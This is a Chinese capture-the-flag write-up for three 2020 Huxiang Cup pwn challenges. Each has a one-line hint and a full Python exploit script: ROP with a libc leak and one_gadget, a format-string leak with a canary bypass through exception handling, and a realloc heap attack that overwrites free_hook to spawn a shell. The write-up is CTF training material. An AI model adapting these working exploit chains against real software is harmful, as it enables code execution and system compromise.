-
-
2020 湖湘杯 pwn题解
-
2020-11-5 00:13 6292
-
2020 湖湘杯 pwn题解
pwn_printf
简单stack溢出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 | #https://github.com/matrix1001/welpwn from PwnContext import * try : from IPython import embed as ipy except ImportError: print ( 'IPython not installed.' ) if __name__ = = '__main__' : context.terminal = [ 'tmux' , 'splitw' , '-h' ] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send( str (data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter( str (delim), str (data)) sl = lambda data :ctx.sendline( str (data)) sla = lambda delim,data :ctx.sendlineafter( str (delim), str (data)) r = lambda numb = 4096 :ctx.recv(numb) ru = lambda delims, drop = True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda * args, * * kwargs :ctx.start( * args, * * kwargs) dbg = lambda gs = '', * * kwargs :ctx.debug(gdbscript = gs, * * kwargs) # misc functions uu32 = lambda data :u32(data.ljust( 4 , '\0' )) uu64 = lambda data :u64(data.ljust( 8 , '\0' )) ctx.binary = './pwn' #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64' ctx.remote = ( '47.111.104.99' , 52206 ) #ctx.remote_libc = './libc.so' #ctx.debug_remote_libc = True ctx.symbols = { 'dest' : 0x4000000 , } ctx.breakpoints = [ 0x0401009 , 0x40103F , 0x040112E , 0x4007D4 ] #menu def lg(s,addr): print ( '\033[1;31;40m%20s-->0x%x\033[0m' % (s,addr)) #def add(size): #def delete(idx): #def show(idx): #def edit(): #rs() rs( 'remote' ) dbg() ru( 'resting\n' ) for i in range ( 16 ): sl( '32' ) pop_rdi = 0x0401213 puts_plt = 0x400640 puts_got = 0x603018 ret = 0x40117F payload = p64( 0 ) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret) s(payload) libc = uu64(ru( '\x7f' ,drop = False )[ - 6 :]) - 0x6f6a0 lg( 'libc' ,libc) one = libc + 0x4527a payload = '\0' * 8 + p64(one)[: 6 ] s(payload) irt() |
blend_pwn
利用异常捕获机制绕过canary判断控制rbp达成利用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 | #https://github.com/matrix1001/welpwn from PwnContext import * try : from IPython import embed as ipy except ImportError: print ( 'IPython not installed.' ) if __name__ = = '__main__' : context.terminal = [ 'tmux' , 'splitw' , '-h' ] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send( str (data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter( str (delim), str (data)) sl = lambda data :ctx.sendline( str (data)) sla = lambda delim,data :ctx.sendlineafter( str (delim), str (data)) r = lambda numb = 4096 :ctx.recv(numb) ru = lambda delims, drop = True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda * args, * * kwargs :ctx.start( * args, * * kwargs) dbg = lambda gs = '', * * kwargs :ctx.debug(gdbscript = gs, * * kwargs) # misc functions uu32 = lambda data :u32(data.ljust( 4 , '\0' )) uu64 = lambda data :u64(data.ljust( 8 , '\0' )) ctx.binary = './pwn' ctx.remote = ( '47.111.96.55' , 53404 ) ctx.symbols = { 'node' : 0x202090 , } ctx.breakpoints = [ 0x117C , 0x11B8 , 0x12C2 ] #menu def lg(s,addr): print ( '\033[1;31;40m%20s-->0x%x\033[0m' % (s,addr)) def add(content = '\n' ): sla( '>' , 2 ) sa( 'note:\n' ,content) def delete(idx): sla( '>' , 3 ) sla( 'index>' ,idx) def show_name(): sla( '>' , 1 ) def show(): sla( '>' , 4 ) #def show(idx): #def edit(): #rs() rs( 'remote' ) #dbg() name = "%3$p" sla( 'name: ' ,name) show_name() ru( 'Current user:' ) libc = int (r( 14 ), 16 ) lg( 'libc' ,libc) base = libc - 0xf7380 malloc_hook = base + 0x3c4aed payload = p64(base + 0x45226 ) * 10 add(payload + '\n' ) add(payload + '\n' ) delete( 0 ) delete( 1 ) dbg() show() ru( '2:' ) heap = uu64(r( 6 )) aim = heap + 0x10 lg( 'aim' ,aim) #add() #delete(0) #delete(1) #delete(0) sla( '>' , 666 ) payload = '0' * 0x20 + p64(aim + 0x20 )[: 6 ] + '\n' sa( 'want' ,payload) irt() |
only_add
realloc利用,注意堆布局
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 | #https://github.com/matrix1001/welpwn from PwnContext import * try : from IPython import embed as ipy except ImportError: print ( 'IPython not installed.' ) import time if __name__ = = '__main__' : context.terminal = [ 'tmux' , 'splitw' , '-h' ] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send( str (data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter( str (delim), str (data)) sl = lambda data :ctx.sendline( str (data)) sla = lambda delim,data :ctx.sendlineafter( str (delim), str (data)) r = lambda numb = 4096 :ctx.recv(numb) ru = lambda delims, drop = True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda * args, * * kwargs :ctx.start( * args, * * kwargs) dbg = lambda gs = '', * * kwargs :ctx.debug(gdbscript = gs, * * kwargs) # misc functions uu32 = lambda data :u32(data.ljust( 4 , '\0' )) uu64 = lambda data :u64(data.ljust( 8 , '\0' )) ctx.binary = './pwn' ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64' #ctx.custom_lib_dir = '/glibc/2.27/amd64/lib' #ctx.remote = ('172.16.9.21', 9006) #ctx.remote_libc = './libc.so' ctx.debug_remote_libc = True ctx.symbols = { 'node' : 0x202040 , 'mark' : 0x202010 } ctx.breakpoints = [ 0xB11 ] #menu def lg(s,addr): print ( '\033[1;31;40m%20s-->0x%x\033[0m' % (s,addr)) def add(size,content = '\n' ,mark = 0 ): if mark = = 0 : sla( 'ice:' , 1 ) sla( 'ize' ,size) if size = = 0 : return sa( 'ta:' ,content) elif mark = = 1 : time.sleep( 0.1 ) sl( 1 ) time.sleep( 0.1 ) sl(size) if size = = 0 : return time.sleep( 0.1 ) sa( 'ta:' ,content) def add_1(size,content = '\n' ): sl( 1 ) time.sleep( 0.1 ) sl(size) time.sleep( 0.1 ) if size = = 0 : return s(content) time.sleep( 0.1 ) def clear(): sla( 'ice' , 2 ) ru( 'ye' ) while True : try : context.log_level = 'info' rs() #rs('remote') # fill the tcache for i in range ( 7 ): add( 0xa0 ) add( 0x10 ) #dbg() add( 0x200 ) add( 0x200 - 0x20 ) add( 0x200 - 0x20 - 0x90 ) #get the unsorted bin add( 0x200 - 0x20 - 0x90 - 0x30 ) add( 0x200 - 0x20 - 0x90 - 0x30 - 0x40 ) add( 0 ) #dbg() add( 0x38 ,p64( 0 ) * 7 + chr ( 0x81 )) add( 0 ) add( 0x20 ) add( 0 ) add( 0x70 ,p64( 0 ) * 5 + p64( 0xc1 ) + '\x1d\x77' ) add( 0 ) #dbg() #dbg() add( 0xe8 ,p64( 0 ) * 29 + chr ( 0x81 )) add( 0 ) add( 0x30 ) add( 0 ) add( 0xe0 ) #dbg() add( 0xe0 - 0x38 ,p64( 0 ) * 21 + chr ( 0x61 )) add( 0 ) add( 0x30 ) add( 0 ) add( 0x50 ,p64( 0 ) * 7 + p64( 0x71 ) + chr ( 0x90 )) add( 0 ) add( 0x70 ) add( 0 ) add( 0x70 ) add( 0 ) #dbg() add( 0x70 , '\0' * 0x43 + p64( 0xfbad3887 ) + p64( 0 ) * 3 + chr ( 0x70 )) libc_base = uu64(ru( '\x7f' ,drop = False )[ - 6 :]) - 0x3b07e3 + 0x73 free_hook = libc_base + 0x3b18e8 system = libc_base + 0x13440 lg( 'libc_base' ,libc_base) clear() add_1( 0x50 ,p64( 0 ) * 7 + p64( 0xd1 ) + p64(free_hook - 0x18 )) add_1( 0 ) add_1( 0x60 ) add_1( 0 ) #dbg() payload = 'exec /bin/sh 1>&2\0' payload = payload.ljust( 0x18 , '\0' ) add_1( 0x60 ,payload + p64(system)) #dbg() add_1( 0 ) #dbg() irt() except KeyboardInterrupt: #break pass except EOFError: #continue pass |
当做记录本来想丢到专栏去的,但是专栏排版好像有些问题,就放到这里来凑数。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
谁下载
无
看原图